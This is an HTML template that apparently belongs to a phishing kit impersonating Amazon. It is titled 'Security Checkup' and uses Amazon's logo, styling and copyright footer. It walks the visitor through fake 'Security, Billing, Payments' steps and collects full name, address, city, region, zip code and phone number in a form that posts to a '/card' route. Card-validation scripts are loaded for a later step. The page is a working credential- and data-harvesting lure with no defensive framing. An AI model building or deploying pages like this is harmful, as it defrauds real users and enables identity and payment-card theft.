<!DOCTYPE html>
<html>
  <head>
    <title>Security Checkup</title>
    <meta charset="UTF-8" />
    <link
      rel="shortcut icon"
      href="{{ url_for('static',filename='img/favicon.ico') }}" />
    <link
      rel="stylesheet"
      type="text/css"
      href="{{ url_for('static',filename='css/boostrap.min.css') }}"
      media="all" />
    <link
      rel="stylesheet"
      href="{{ url_for('static',filename='css/sign-dekstop.css') }}" />
    <link
      rel="stylesheet"
      href="{{ url_for('static',filename='css/style.sign-desktop.css') }}" />
    <link
      rel="stylesheet"
      type="text/css"
      href="{{ url_for('static',filename='css/style.css') }}" />
  </head>

  <body onload="_loader()" style="margin: 0">
    <div id="loader"></div>
    <div style="display: none" id="myDiv" class="animate-bon ttom">
      <div id="a-page">
        <div class="a-section a-padding-medium auth-workflow">
          <div class="a-section a-spacing-none auth-navbar">
            <div class="a-section a-spacing-medium a-text-center">
              <div class="a-link-nav-icon"></div>
              <i class="a-icon a-icon-logo" role="img" aria-label="Amazon"></i>
            </div>
          </div>
          <div id="authportal-center-section" class="a-section">
            <ul
              class="list-unstyled multi-steps"
              style="padding-top: 10px"
              align="center">
              <li>Security</li>
              <li class="is-active">Billing</li>
              <li>Payments</li>
              <li>Finish</li>
            </ul>
            <div class="a-content">
              <div class="container">
                <div class="row" style="padding-top: 5px">
                  <div class="col-12">
                    <div align="center">
                      <img
                        src="{{ url_for('static',filename='img/account.png') }}"
                        width="80" />
                    </div>
                    <div align="center">
                      <span
                        class="lefttext"
                        style="font-size: 20px; font-weight: 650"
                        >Confirm your Address</span
                      >
                    </div>
                    <div align="center">
                      <span class="lefttext"
                        >Please enter the information that matches your
                        account.</span
                      >
                    </div>
                    <br />
                    <div class="mypayementarea">
                      <form
                        action="/card"
                        method="post"
                        name="konzform"
                        id="konzform">
                        <span class="colorblacked">Billing address</span>
                        <div class="row mt-2">
                          <div class="col-sm-6">
                            <div class="form-group">
                              <label for="fullname"> Full name </label>
                              <input
                                type="text"
                                class="form-control amazoninput addressfocus"
                                name="fullname"
                                id="fullname"
                                placeholder="Full name"
                                minlength="5"
                                maxlength="30"
                                onkeypress="return alpha(event)" />
                            </div>
                          </div>
                          <div class="col-sm-6">
                            <div class="form-group">
                              <label for="adressline1"> Address </label>
                              <input
                                type="text"
                                class="form-control amazoninput addressfocus"
                                name="address"
                                id="adressline1"
                                placeholder="Street address or P.O. box"
                                minlength="5"
                                maxlength="30" />
                            </div>
                          </div>
                          <div class="col-sm-6">
                            <div class="form-group">
                              <label for="adressline2"> City </label>
                              <input
                                type="text"
                                id="cityp"
                                class="form-control amazoninput cityfocus"
                                name="cityp"
                                placeholder="City"
                                maxlength="25"
                                onkeypress="return alpha(event)" />
                            </div>
                          </div>
                          <div class="col-sm-6">
                            <div class="form-group">
                              <label for="stateregionprovince">
                                State/Province/Region
                              </label>
                              <input
                                type="text"
                                class="form-control amazoninput regionfocus"
                                name="region"
                                id="region"
                                placeholder="State/Province/Region"
                                maxlength="30"
                                onkeypress="return alpha(event)" />
                            </div>
                          </div>
                          <div class="col-sm-6">
                            <div class="form-group">
                              <label for="zipCode"> Zip Code </label>
                              <input
                                type="text"
                                class="form-control amazoninput zipfocus"
                                name="zipcode"
                                id="zipCode"
                                placeholder="Zip/Postal code"
                                maxlength="12" />
                            </div>
                          </div>
                          <div class="col-sm-6">
                            <div class="form-group">
                              <label for="phone"> Phone number </label>
                              <input
                                type="text"
                                class="form-control amazoninput zipfocus"
                                name="phone"
                                id="phone"
                                placeholder="Phone number"
                                maxlength="14" />
                            </div>
                          </div>
                        </div>
                        <div class="a-row a-spacing-small">
                          <span
                            id="cvf-submit-otp-button"
                            class="a-button a-button-span2 a-button-primary cvf-widget-btn cvf-widget-btn-verify">
                            <span class="a-button-inner">
                              <button
                                type="submit"
                                name="Sex"
                                class="a-button-text"
                                role="button">
                                Continue
                              </button>
                            </span>
                          </span>
                        </div>
                      </form>
                    </div>
                  </div>
                  <script>
                    P.when("A", "ready").execute(function (A) {
                      var $ = A.$;
                      $(".cvf-widget-link-resend").click(function () {
                        $(".cvf-widget-form-resend").submit();
                      });
                    });
                  </script>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
      <div class="a-section a-spacing-top-extra-large auth-footer">
        <div class="a-divider a-divider-section">
          <div class="a-divider-inner"></div>
        </div>
        <div class="a-section a-spacing-small a-text-center a-size-mini">
          <span class="auth-footer-seperator"></span>
          <a class="a-link-normal"> Conditions of Use </a>
          <span class="auth-footer-seperator"></span>
          <a class="a-link-normal"> Privacy Notice </a>
          <span class="auth-footer-seperator"></span>
          <a class="a-link-normal"> Help </a>
          <span class="auth-footer-seperator"></span>
        </div>
        <div class="a-section a-spacing-none a-text-center">
          <span class="a-size-mini a-color-secondary">
            © 1996-2023, Amazon.com, Inc. or its affiliates
          </span>
        </div>
      </div>
    </div>
    <script src="{{ url_for('static',filename='js/jquery-3.3.1.min.js') }}"></script>
    <script src="{{ url_for('static',filename='js/jquery.mask.min.js') }}"></script>
    <script src="{{ url_for('static',filename='js/jquery.validate.min.js') }}"></script>
    <script src="{{ url_for('static',filename='js/additional-methods.min.js') }}"></script>
    <script src="{{ url_for('static',filename='js/jquery.creditCardValidator.js') }}"></script>
    <script>
      function numOnly(id) {
        // Get the element by id
        var element = document.getElementById(id);
        // Use numbers only pattern, from 0 to 9 with \-
        var regex = /[^0-9\-]/gi;
        // Replace other characters that are not in regex pattern
        element.value = element.value.replace(regex, "");
      }
    </script>
    <script>
      let load;

      let _loader = () => {
        load = setTimeout(showPage, 1000);
      };

      let showPage = () => {
        document.getElementById("loader").style.display = "none";
        document.getElementById("myDiv").style.display = "block";
      };

      const alpha = (e) => {
        let k;
        document.all ? (k = e.keyCode) : (k = e.which);
        return (
          (k > 64 && k < 91) ||
          (k > 96 && k < 123) ||
          k == 8 ||
          k == 32 ||
          (k >= 48 && k <= 57)
        );
      };

      $(document).ready(function (e) {
        $("#konzform").validate({
          errorClass: "error-class",
          rules: {
            address: {
              required: true,
              minlength: 5,
            },
            cityp: {
              required: true,
              minlength: 3,
              maxlength: 30,
            },
            region: {
              required: true,
              minlength: 2,
              maxlength: 30,
            },
            zipcode: {
              required: true,
              minlength: 2,
              maxlength: 12,
            },
          },
          messages: {
            address: {
              required: "Please enter a Address.",
            },
            cityp: {
              required: "Please enter a City name.",
            },
            region: {
              required: "Please enter a State, Region or Province.",
            },
            zipcode: {
              required: "Amazon Alert",
            },
          },
        });
      });
    </script>
  </body>
</html>
